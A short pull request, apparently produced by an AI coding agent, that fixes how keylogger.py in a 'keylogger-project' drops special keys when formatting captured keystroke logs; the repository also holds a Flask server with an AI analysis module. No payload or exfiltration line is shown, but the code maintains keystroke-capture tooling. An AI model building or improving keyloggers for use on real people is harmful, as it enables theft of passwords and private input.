### PR TITLE
Fix key filtering bug

### DIFF
--- a/keylogger-project/keylogger.py
+++ b/keylogger-project/keylogger.py
@@ -146,7 +146,7 @@ def format_logs(keys):
             k = "<caps_lock>"
         elif key == "Key.enter":
             k = "<enter>"
-        elif key.find("Key") > 0:
+        elif key.startswith("Key"):
             k = ""
         message += k
     return message


### PR DESCRIPTION
## Summary
- ignore any special key starting with `Key` when formatting logs

## Testing
- `python3 -m py_compile flask-server/server.py flask-server/ai_analysis.py keylogger-project/keylogger.py`


------
https://chatgpt.com/codex/tasks/task_e_685f8a47f3f8833192891a1a94906327